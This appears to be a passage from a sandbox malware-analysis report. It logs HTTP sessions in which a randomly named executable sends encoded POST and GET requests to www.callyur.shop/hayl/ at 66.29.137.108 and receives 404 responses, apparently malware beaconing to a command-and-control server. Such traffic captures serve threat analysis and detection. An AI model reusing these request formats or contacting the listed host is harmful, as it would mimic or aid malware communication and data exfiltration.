                                                                                  Referer: http://www.callyur.shop/hayl/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                                                  Data Raw: 47 52 35 34 79 48 5a 38 3d 32 73 6f 56 59 2f 42 43 4b 77 52 78 6f 36 52 37 6b 47 31 66 57 53 38 58 53 68 31 6b 61 78 44 68 56 65 78 72 54 57 47 49 52 4f 56 78 73 61 42 72 6b 4d 79 4b 53 37 43 43 4d 49 2f 31 71 54 42 4c 35 30 42 4e 6d 65 2f 33 6c 30 56 48 78 57 49 70 2f 56 45 75 66 44 42 73 37 35 61 69 38 72 4f 58 41 71 43 49 67 61 42 77 31 65 43 76 32 79 39 41 34 31 56 66 78 30 36 51 77 69 41 62 70 78 7a 48 45 62 6a 36 75 4f 55 70 47 63 71 6a 72 55 6b 2f 67 59 69 73 7a 6a 64 38 44 35 63 59 58 36 75 64 65 65 39 47 61 52 77 4a 6c 6f 51 6a 54 4f 73 42 4e 4f 74 36 61 36 6b 73 2b 4c 4d 63 62 39 30 4b 4f 59 6b 4e 6f 76 66 4a 69 33 76 6a
                                                                                  Data Ascii: GR54yHZ8=2soVY/BCKwRxo6R7kG1fWS8XSh1kaxDhVexrTWGIROVxsaBrkMyKS7CCMI/1qTBL50BNme/3l0VHxWIp/VEufDBs75ai8rOXAqCIgaBw1eCv2y9A41Vfx06QwiAbpxzHEbj6uOUpGcqjrUk/gYiszjd8D5cYX6udee9GaRwJloQjTOsBNOt6a6ks+LMcb90KOYkNovfJi3vj
                                                                                  Nov 20, 2024 08:33:26.642684937 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                  keep-alive: timeout=5, max=100
                                                                                  content-type: text/html
                                                                                  transfer-encoding: chunked
                                                                                  content-encoding: gzip
                                                                                  vary: Accept-Encoding
                                                                                  date: Wed, 20 Nov 2024 07:33:26 GMT
                                                                                  server: LiteSpeed
                                                                                  x-turbo-charged-by: LiteSpeed
                                                                                  connection: close
                                                                                  Data Raw: 31 33 34 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 3a e9 72 e2 5a 7a ff ef 53 10 a7 92 cc 94 da ad 15 10 1e bb 67 b4 21 09 90 90 04 02 44 2a 75 4b bb 84 56 b4 c3 54 1e 28 af 91 27 cb 11 b6 db 98 b6 6f f7 a4 f2 23 a7 7f 18 9d e5 db 97 d3 df 77 7e fb ed b7 c7 7f 62 97 cc da 50 b8 41 50 25 f1 b7 df 1e 9f ff 0c c0 78 0c 5c d3 f9 f6 db e5 67 e2 56 26 d8 51 e5 f7 ee b1 0e 9b a7 3b 26 4b 2b 37 ad ee ab 53 ee de 0d ec e7 af a7 bb ca ed 2a b8 07 f1 97 81 1d 98 45 e9 56 4f 75 e5 dd 93 77 9f c2 31 ed c0 bd ef cf 17 59 7c 05 28 cd ee ed 7e e9 d3 83 4a 61 fa 89 f9 8f 9c e0 ba 3c 2c dc f2 ea 08 f2 0e 7a 6a 26 ee d3 5d 13 ba 6d 9e 15 d5 d5 b6 36 74 aa e0 c9 71 9b d0 76 ef 2f 1f 5f 06 61 1a 56 a1 19 df 97 b6 19 bb 4f e8 d7 ef a0 aa b0 8a dd 6f 04 42 0c e4 ac 1a 4c b3 3a 75 1e e1 e7 c9 67 51 96 d5 29 76 07 bd dc 5e c4 65 97 e5 0b 1d bd a8 ad cc 39 0d fe 7e d9 da 7f f6 c3 03 d2 b9 f7 cc 24 8c 4f 0f 03 aa 00 68 bf 0c 04 37 6e dc 2a b4 cd 2f 83 d2 4c cb fb d2 2d 42 ef 2f 3f 1e 2b c3 b3 fb 30 40 89 bc 7b bf 18 87 a9 7b [TRUNCATED]
                                                                                  Data Ascii: 1348:rZzSg!D*uKVT('o#w~bPAP%x\gV&Q;&K+7S*EVOuw1Y|(~Ja<,zj&]m6tqv/_aVOoBL:ugQ)v^e9~$Oh7n*/L-B/?+0@{{T`+1J`,(?{~61yf>1?LMwK,X*ylYXqfGgbz&>v= %^g)E5W`y}zre.2qyVANYf$?Se/5q+e|HooKa@\WZk0\OWe]qyKS>0`G?Rqaxc-+I+^kgaB[A=WxD3WC5nqe_x2.?_6Ain=WD|nq#EF7=-L/1euI+ 2x#W+u7y]qh81\4ml[z7/FK901[5~g{9r@K~y5?67=_$u` +%nC$y}VC625?- :3>4D%~)
                                                                                  Nov 20, 2024 08:33:26.642726898 CET | 224 | IN | Data Raw: 9b 1a de e8 f9 5b e2 3a a1 39 f8 53 02 02 e9 8b 62 c6 23 32 ef fe 7c 83 e6 d6 6a 6f 96 7b e1 e5 59 79 c9 50 0f 83 c2 8d 41 ac 6b 6e 1c b0 df d3 47 2c e0 3f ed c3 20 08 1d c7 4d df 48 ea 57 fb 71 95 9f 2e 96 fd ec d7 ef f7 bd 91 df 9f b8 25 ed c3
                                                                                  Data Ascii: [:9Sb#2|jo{YyPAknG,? MHWq.%,o?FH"{/j_vGI?)':KCKY~Ui0,fHb5*M~k\Ufq]}\/
                                                                                  Nov 20, 2024 08:33:26.642762899 CET | 1236 | IN | Data Raw: f1 ab f8 d1 9f ec c7 eb f5 e6 83 a5 57 96 90 9b 7b 7a 7f ec 46 38 2f 17 ee 67 ed 7f 60 40 37 f9 fa 33 c5 bf 41 fd 20 f8 4c 26 40 b4 ff 8b e0 f3 63 d8 a8 8b f8 4f 8e 59 99 0f 97 30 02 e7 a9 ff 17 cb 2c dd 11 f1 25 dc d0 4b ad 45 e6 bc 9f 51 60 c8
                                                                                  Data Ascii: W{zF8/g`@73A L&@cOY0,%KEQ`+=tROP!p?`cyAM=/P8tuVEUo-XYqO5cw#/X0H8S2cL4nPv/ImVqf]>D
                                                                                  Nov 20, 2024 08:33:26.642796040 CET | 1236 | IN | Data Raw: 81 e2 76 b8 6c 8a ea a2 15 44 51 8d d5 48 b1 da 52 9b e6 4e e2 58 70 c0 92 eb 15 cb b4 6b ba 26 b7 38 52 ae c4 70 35 06 16 d3 ee c7 8c 4f b9 ec 21 36 a5 49 54 51 2c 02 49 5d 0b 8a d3 e4 ae 5c 9b 52 a6 89 19 63 ee 13 1f a7 55 7f 71 2c 84 0d 43 d7
                                                                                  Data Ascii: vlDQHRNXpk&8Rp5O!6ITQ,I]\RcUq,C1eCL)O6c94\[fbr5%rJHP0R#nUDliK",pPjlkm,P9f)d0<"{d9I#U#X*z4
                                                                                  Nov 20, 2024 08:33:26.642832994 CET | 448 | IN | Data Raw: 8b d3 b8 96 47 8a 0b b7 54 5a d0 dd 32 a5 cc 93 b8 5a 6c 23 95 6c 33 7a 7e d2 20 c8 d1 d7 65 cd cd a1 05 99 63 34 4b 78 bc 53 7a c7 a0 e3 d5 b5 ba 8f 6b 41 5f ec 0a ad 04 97 2b 9a 43 96 fe 59 8c 0b 53 23 9b a8 1d 1d d3 5d 52 b3 ab 29 a9 f9 2b b2
                                                                                  Data Ascii: GTZ2Zl#l3z~ ec4KxSzkA_+CYS#]R)+ ;$3Z3q-4j<ybh("0=ai-C]":dnUvMmn5f<oW7A '@ZU"kIQXV;;,K|,wCUO
                                                                                  Nov 20, 2024 08:33:26.642863989 CET | 848 | IN | Data Raw: 3d de 46 94 45 a2 d1 99 f4 b8 6c 28 9b 48 41 a9 86 4e ce 55 6e 0b 72 5f 44 99 a6 97 6a 4a b8 e3 78 41 61 18 cb 4e bb 3c 10 39 45 49 83 9d 3d d9 45 9a 5c 0b 01 ce b4 e4 6c 57 b9 2e b3 19 ef 0f 3e dc d6 26 69 f0 31 be 6b 58 5d 39 c1 36 4c 35 0e 01
                                                                                  Data Ascii: =FEl(HANUnr_DjJxAaN<9EI=E\lW.>&i1kX]96L52:/i+OO&>m\> @Ow~}YiCGGxy7_E;=G'lvlU?Au}x>~Nw^x|v


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  26 | 192.168.2.6 | 50015 | 66.29.137.108 | 80 | 3320 | C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Nov 20, 2024 08:33:28.617840052 CET | 834 | OUT | POST /hayl/ HTTP/1.1
                                                                                  Host: www.callyur.shop
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Connection: close
                                                                                  Content-Length: 237
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  Origin: http://www.callyur.shop
                                                                                  Referer: http://www.callyur.shop/hayl/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                                                  Data Raw: 47 52 35 34 79 48 5a 38 3d 32 73 6f 56 59 2f 42 43 4b 77 52 78 6f 61 68 37 6c 68 5a 66 65 53 38 55 64 42 31 6b 44 42 44 39 56 65 31 72 54 58 44 56 52 34 46 78 73 34 5a 72 6c 49 47 4b 54 37 43 43 55 59 2f 77 33 6a 42 45 35 30 46 46 6d 61 6a 33 6c 77 31 48 78 55 67 70 2b 69 6f 74 66 54 42 75 79 5a 61 67 69 62 4f 58 41 71 43 49 67 61 46 65 31 65 61 76 33 47 35 41 71 45 56 63 33 45 36 66 6e 53 41 62 69 52 79 4f 45 62 6a 63 75 50 49 58 47 5a 32 6a 72 57 73 2f 67 71 4b 76 36 6a 63 33 4f 5a 64 4c 55 6f 2f 51 52 76 30 42 45 6a 38 61 2b 71 34 4a 57 34 78 62 52 39 74 5a 49 71 45 75 2b 4a 55 75 62 64 30 67 4d 59 63 4e 36 34 54 75 74 44 4b 41 79 79 4c 55 33 65 56 63 59 62 6e 68 42 49 72 53 68 42 68 63 50 51 3d 3d
                                                                                  Data Ascii: GR54yHZ8=2soVY/BCKwRxoah7lhZfeS8UdB1kDBD9Ve1rTXDVR4Fxs4ZrlIGKT7CCUY/w3jBE50FFmaj3lw1HxUgp+iotfTBuyZagibOXAqCIgaFe1eav3G5AqEVc3E6fnSAbiRyOEbjcuPIXGZ2jrWs/gqKv6jc3OZdLUo/QRv0BEj8a+q4JW4xbR9tZIqEu+JUubd0gMYcN64TutDKAyyLU3eVcYbnhBIrShBhcPQ==
                                                                                  Nov 20, 2024 08:33:29.217259884 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                  keep-alive: timeout=5, max=100
                                                                                  content-type: text/html
                                                                                  transfer-encoding: chunked
                                                                                  content-encoding: gzip
                                                                                  vary: Accept-Encoding
                                                                                  date: Wed, 20 Nov 2024 07:33:29 GMT
                                                                                  server: LiteSpeed
                                                                                  x-turbo-charged-by: LiteSpeed
                                                                                  connection: close
                                                                                  Data Raw: 31 33 34 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 3a e9 72 e2 5a 7a ff ef 53 10 a7 92 cc 94 da ad 15 90 3c 76 cf 68 43 12 20 21 09 04 88 54 ea 96 d0 8e 56 b4 c3 54 1e 28 af 91 27 cb 11 b6 db 98 b6 6f f7 a4 f2 23 a7 7f 18 9d e5 db 97 d3 df 77 7e fb ed b7 c7 7f e2 16 ec ca 54 f9 41 50 25 f1 b7 df 1e 9f ff 0c c0 78 0c 5c cb f9 f6 db e5 67 e2 56 16 d8 51 e5 f7 ee b1 0e 9b a7 3b 36 4b 2b 37 ad ee ab 53 ee de 0d ec e7 af a7 bb ca ed 2a b8 07 f1 97 81 1d 58 45 e9 56 4f 75 e5 dd 93 77 9f c2 b1 ec c0 bd ef cf 17 59 7c 05 28 cd ee ed 7e e9 d3 83 6a 61 f9 89 f5 8f 9c e0 bb 3c 2c dc f2 ea 08 f2 0e 7a 6a 25 ee d3 5d 13 ba 6d 9e 15 d5 d5 b6 36 74 aa e0 c9 71 9b d0 76 ef 2f 1f 5f 06 61 1a 56 a1 15 df 97 b6 15 bb 4f e8 d7 ef a0 aa b0 8a dd 6f 04 42 0c 94 ac 1a 4c b2 3a 75 1e e1 e7 c9 67 51 96 d5 29 76 07 bd dc 5e c4 65 97 e5 0b 1d bd a8 f7 99 73 1a fc fd b2 b5 ff ec 87 07 a4 73 ef 59 49 18 9f 1e 06 74 01 d0 7e 19 88 6e dc b8 55 68 5b 5f 06 a5 95 96 f7 a5 5b 84 de 5f 7e 3c 56 86 67 f7 61 80 12 79 f7 7e 31 0e 53 f7 [TRUNCATED]
                                                                                  Data Ascii: 1348:rZzS<vhC !TVT('o#w~TAP%x\gVQ;6K+7S*XEVOuwY|(~ja<,zj%]m6tqv/_aVOoBL:ugQ)v^essYIt~nUh[_[_~<Vgay~1S>pC?W#cEPQ.5lc8~-'L|b~]YUnq#',$r#{Y._EYZae77Whqo_YC?:]V{LW]djW|,u"!-q]Ykt7p=W;_bNmkx["~}XIy%a~p0}seqYUel/+[BGWxV{Da) kev]~l8z+="WD|nq#EF7=-L/1euI+ 2x#W+u7y]qh81\4ml[z7/FK90[5~g{9r@K~gE/k.AHrT~+q@&[]&N>8&r!<.#m\u~^O
                                                                                  Nov 20, 2024 08:33:29.217322111 CET | 1236 | IN | Data Raw: df d4 f0 46 cf df 12 d7 09 ad c1 9f 12 10 48 5f 14 33 1e 91 79 f7 e7 1b 34 b7 56 7b b3 dc 0b 2f cf ca 4b 86 7a 18 14 6e 0c 62 5d 73 e3 80 fd 9e 3e 62 01 ff 69 1f 06 41 e8 38 6e fa 46 52 bf da 8f ab fc 74 b1 ec 67 bf 7e bf ef 8d fc fe c4 2d 69 1f
                                                                                  Data Ascii: FH_3y4V{/Kznb]s>biA8nFRtg~-if~w1@D.E=)QW@{zk~ \A;'T<P,U.eU}#?=2G?f=?p}us\G^YBn
                                                                                  Nov 20, 2024 08:33:29.217359066 CET | 1236 | IN | Data Raw: 89 53 73 58 32 db 70 d1 e9 a2 ef f2 33 3b d9 cb 12 65 db a2 ce 3a 9d e1 9a 56 3a c9 b5 a9 cc 18 9c 34 e9 5a d4 0e a6 21 43 67 49 74 c6 3b 02 8f a1 b4 de 08 c9 26 88 b4 12 b1 46 e6 d8 14 d7 ee 78 8c 25 68 b5 8b 0d 86 0f 66 12 15 8d d2 7a ce 93 fb
                                                                                  Data Ascii: SsX2p3;e:V:4Z!CgIt;&Fx%hfzlY^tTqf76@gk&h`9q;wCkA:4C}3-FID3Bm}C4j"(K)'taBSbcm}tX6oEIb-RmO
                                                                                  Nov 20, 2024 08:33:29.217391968 CET | 1236 | IN | Data Raw: 00 4e ad 32 4d 7b 3e 2e e2 7a d5 04 1c b3 66 30 8b 90 4e 1d 4c 18 dd bc e8 48 3f 3b d9 1b c4 e0 fd 05 71 c2 e6 b8 08 19 f1 70 2b c1 44 93 d9 a3 62 17 d1 38 93 37 78 7a f0 96 70 1a e8 63 12 05 a1 59 19 55 c4 c2 dd 74 5a 57 47 a9 5f 4f d1 25 49 d0
                                                                                  Data Ascii: N2M{>.zf0NLH?;qp+Db87xzpcYUtZWG_O%IN-}R=c^Dfi~vc6gE7#[[tpPJ`fx{Bf!<mx8,~D2twhpS8&K/:< A4r\& j~HuN[u
                                                                                  Nov 20, 2024 08:33:29.217482090 CET | 284 | IN | Data Raw: 03 f8 27 e0 af 98 ba ae 29 7f c2 cb 35 f9 b7 96 fa 99 39 fd e9 c5 9e fe fc a9 10 2e 7c be 57 e1 35 a2 e7 e5 3f 12 14 90 e2 3b de 9f 25 74 f7 ed 11 fe ec d4 23 fc 91 56 6e ec e8 03 ba ae 22 c1 2b 89 8f cf 1d bc f7 72 fe 65 a3 7a f5 ed fe e1 d6 03
                                                                                  Data Ascii: ')59.|W5?;%t#Vn"+rezdhn;3J~/6H[au&.3}Ot<i%O $\*<{PSH`y~~l>?ZzfeE~o((>PG


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  27 | 192.168.2.6 | 50016 | 66.29.137.108 | 80 | 3320 | C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Nov 20, 2024 08:33:31.169580936 CET | 1847 | OUT | POST /hayl/ HTTP/1.1
                                                                                  Host: www.callyur.shop
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Connection: close
                                                                                  Content-Length: 1249
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  Origin: http://www.callyur.shop
                                                                                  Referer: http://www.callyur.shop/hayl/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                                                  Data Raw: 47 52 35 34 79 48 5a 38 3d 32 73 6f 56 59 2f 42 43 4b 77 52 78 6f 61 68 37 6c 68 5a 66 65 53 38 55 64 42 31 6b 44 42 44 39 56 65 31 72 54 58 44 56 52 34 4e 78 74 4c 52 72 6b 70 47 4b 43 4c 43 43 64 34 2f 4c 33 6a 42 5a 35 30 39 4a 6d 64 72 34 6c 32 35 48 72 31 41 70 32 77 51 74 4d 7a 42 75 74 4a 61 68 38 72 4f 34 41 71 53 4d 67 62 31 65 31 65 61 76 33 48 4a 41 6f 56 56 63 31 45 36 51 77 69 41 66 70 78 79 6d 45 62 36 6e 75 50 39 69 46 74 36 6a 73 31 45 2f 37 2f 57 76 78 6a 63 31 4e 5a 63 4d 55 6f 79 51 52 76 34 72 45 69 49 77 2b 71 4d 4a 58 39 52 46 4e 4a 5a 47 63 5a 6f 78 6c 37 77 59 63 34 55 4e 55 4a 55 30 79 72 61 54 71 58 47 30 38 6c 4c 2f 36 4d 64 5a 52 71 6a 50 66 39 43 39 6c 41 56 59 54 5a 6c 33 61 53 49 55 72 32 38 44 4f 49 48 75 7a 6b 5a 32 73 65 67 6d 7a 70 62 6a 75 51 6a 44 73 65 34 36 6e 74 49 33 78 61 46 66 6b 79 4f 72 6c 32 58 65 2b 64 75 71 76 4c 63 61 32 6b 54 4a 4f 74 58 41 54 5a 34 47 42 67 59 77 42 49 42 7a 48 39 61 48 50 4b 49 79 44 50 33 4f 73 62 76 2b 52 37 61 44 71 49 39 6e 31 [TRUNCATED]
                                                                                  Data Ascii: GR54yHZ8=2soVY/BCKwRxoah7lhZfeS8UdB1kDBD9Ve1rTXDVR4NxtLRrkpGKCLCCd4/L3jBZ509Jmdr4l25Hr1Ap2wQtMzButJah8rO4AqSMgb1e1eav3HJAoVVc1E6QwiAfpxymEb6nuP9iFt6js1E/7/Wvxjc1NZcMUoyQRv4rEiIw+qMJX9RFNJZGcZoxl7wYc4UNUJU0yraTqXG08lL/6MdZRqjPf9C9lAVYTZl3aSIUr28DOIHuzkZ2segmzpbjuQjDse46ntI3xaFfkyOrl2Xe+duqvLca2kTJOtXATZ4GBgYwBIBzH9aHPKIyDP3Osbv+R7aDqI9n1 [TRUNCATED]
                                                                                  Nov 20, 2024 08:33:31.752266884 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                  keep-alive: timeout=5, max=100
                                                                                  content-type: text/html
                                                                                  transfer-encoding: chunked
                                                                                  content-encoding: gzip
                                                                                  vary: Accept-Encoding
                                                                                  date: Wed, 20 Nov 2024 07:33:31 GMT
                                                                                  server: LiteSpeed
                                                                                  x-turbo-charged-by: LiteSpeed
                                                                                  connection: close
                                                                                  Data Raw: 31 33 34 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 3a e9 72 e2 5a 7a ff ef 53 10 a7 92 cc 94 da ad 15 10 1e bb 67 b4 21 09 90 90 04 02 44 2a 75 4b bb 84 56 b4 c3 54 1e 28 af 91 27 cb 11 b6 db 98 b6 6f f7 a4 f2 23 a7 7f 18 9d e5 db 97 d3 df 77 7e fb ed b7 c7 7f 62 97 cc da 50 b8 41 50 25 f1 b7 df 1e 9f ff 0c c0 78 0c 5c d3 f9 f6 db e5 67 e2 56 26 d8 51 e5 f7 ee b1 0e 9b a7 3b 26 4b 2b 37 ad ee ab 53 ee de 0d ec e7 af a7 bb ca ed 2a b8 07 f1 97 81 1d 98 45 e9 56 4f 75 e5 dd 93 77 9f c2 31 ed c0 bd ef cf 17 59 7c 05 28 cd ee ed 7e e9 d3 83 4a 61 fa 89 f9 8f 9c e0 ba 3c 2c dc f2 ea 08 f2 0e 7a 6a 26 ee d3 5d 13 ba 6d 9e 15 d5 d5 b6 36 74 aa e0 c9 71 9b d0 76 ef 2f 1f 5f 06 61 1a 56 a1 19 df 97 b6 19 bb 4f e8 d7 ef a0 aa b0 8a dd 6f 04 42 0c e4 ac 1a 4c b3 3a 75 1e e1 e7 c9 67 51 96 d5 29 76 07 bd dc 5e c4 65 97 e5 0b 1d bd a8 ad cc 39 0d fe 7e d9 da 7f f6 c3 03 d2 b9 f7 cc 24 8c 4f 0f 03 aa 00 68 bf 0c 04 37 6e dc 2a b4 cd 2f 83 d2 4c cb fb d2 2d 42 ef 2f 3f 1e 2b c3 b3 fb 30 40 89 bc 7b bf 18 87 a9 7b [TRUNCATED]
                                                                                  Data Ascii: 1348:rZzSg!D*uKVT('o#w~bPAP%x\gV&Q;&K+7S*EVOuw1Y|(~Ja<,zj&]m6tqv/_aVOoBL:ugQ)v^e9~$Oh7n*/L-B/?+0@{{T`+1J`,(?{~61yf>1?LMwK,X*ylYXqfGgbz&>v= %^g)E5W`y}zre.2qyVANYf$?Se/5q+e|HooKa@\WZk0\OWe]qyKS>0`G?Rqaxc-+I+^kgaB[A=WxD3WC5nqe_x2.?_6Ain=WD|nq#EF7=-L/1euI+ 2x#W+u7y]qh81\4ml[z7/FK901[5~g{9r@K~y5?67=_$u` +%nC$y}VC625?- :3>4D%~)
                                                                                  Nov 20, 2024 08:33:31.752319098 CET | 1236 | IN | Data Raw: 9b 1a de e8 f9 5b e2 3a a1 39 f8 53 02 02 e9 8b 62 c6 23 32 ef fe 7c 83 e6 d6 6a 6f 96 7b e1 e5 59 79 c9 50 0f 83 c2 8d 41 ac 6b 6e 1c b0 df d3 47 2c e0 3f ed c3 20 08 1d c7 4d df 48 ea 57 fb 71 95 9f 2e 96 fd ec d7 ef f7 bd 91 df 9f b8 25 ed c3
                                                                                  Data Ascii: [:9Sb#2|jo{YyPAknG,? MHWq.%,o?FH"{/j_vGI?)':KCKY~Ui0,fHb5*M~k\Ufq]}\/W{z
                                                                                  Nov 20, 2024 08:33:31.752335072 CET | 1236 | IN | Data Raw: 7c b2 80 45 a3 0d 97 9d 26 f8 2e 37 b7 13 4b 12 27 b6 2d 68 8c d3 e9 ae 61 a6 d3 5c 9d 49 b4 ce 8a d3 ae 45 ed 60 16 d2 54 96 44 67 bc 23 f0 18 4a eb 2d 9f 6c 83 48 2d 11 73 64 8c 0d 61 e3 8e c7 58 82 56 fb 58 a7 b9 60 2e 4e a2 51 5a 2f 38 d2 3a
                                                                                  Data Ascii: |E&.7K'-ha\IE`TDg#J-lH-sdaXVX`.NQZ/8:7+NekvLm>CU>GpN+MNg\`5~[Jy<e6epZ%2]NELjnC(+/WbNhCKqHPvlDQHR
                                                                                  Nov 20, 2024 08:33:31.752351046 CET | 672 | IN | Data Raw: 70 6a 85 6e da f3 71 19 d7 eb 26 60 e9 0d 8d 99 84 78 ea 60 42 ef 16 45 47 fa d9 c9 de 22 3a e7 2f 89 13 b6 c0 05 48 8f 87 3b 11 26 9a cc 1e 15 fb 88 c2 e9 bc c1 d3 83 b7 82 d3 40 1b 93 28 08 cd f2 a8 22 96 ee b6 53 bb 3a 4a fd 7a 86 ae 48 82 d2
                                                                                  Data Ascii: pjnq&`x`BEG":/H;&@("S:JzH4Bkctj-L)4e9LDNA9+ligH]{E\0[ 7qLlMBP4ywL>\y9M^2(lxUGTZ2Zl
                                                                                  Nov 20, 2024 08:33:31.752413034 CET | 848 | IN | Data Raw: 3d de 46 94 45 a2 d1 99 f4 b8 6c 28 9b 48 41 a9 86 4e ce 55 6e 0b 72 5f 44 99 a6 97 6a 4a b8 e3 78 41 61 18 cb 4e bb 3c 10 39 45 49 83 9d 3d d9 45 9a 5c 0b 01 ce b4 e4 6c 57 b9 2e b3 19 ef 0f 3e dc d6 26 69 f0 31 be 6b 58 5d 39 c1 36 4c 35 0e 01
                                                                                  Data Ascii: =FEl(HANUnr_DjJxAaN<9EI=E\lW.>&i1kX]96L52:/i+OO&>m\> @Ow~}YiCGGxy7_E;=G'lvlU?Au}x>~Nw^x|v


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  28 | 192.168.2.6 | 50017 | 66.29.137.108 | 80 | 3320 | C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Nov 20, 2024 08:33:33.711628914 CET | 554 | OUT | GET /hayl/?GR54yHZ8=7uA1bLkCaR9ampYb6jJSXGsXTCFtFEKjMbBrHkb2OaN+7KcXsqyJMoKLTM78+R5XhUdg+bLytXUVrFAv0hUdKTwX6reWgqWzJPe83oti/Pnp22FBmmdcqVWV2wV/tDaQIoOgzZo=&9xn=fHadNpk8MVax HTTP/1.1
                                                                                  Host: www.callyur.shop
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                                                  Nov 20, 2024 08:33:34.314476013 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                  keep-alive: timeout=5, max=100
                                                                                  content-type: text/html
                                                                                  transfer-encoding: chunked
                                                                                  date: Wed, 20 Nov 2024 07:33:34 GMT
                                                                                  server: LiteSpeed
                                                                                  x-turbo-charged-by: LiteSpeed
                                                                                  connection: close
                                                                                  Data Raw: 32 37 37 35 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 [TRUNCATED]
                                                                                  Data Ascii: 2775<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; [TRUNCATED]
                                                                                  Nov 20, 2024 08:33:34.314532995 CET | 1236 | IN | Data Raw: 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63
                                                                                  Data Ascii: } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text { color: #000000; } .additional-info { background-repeat: no-rep
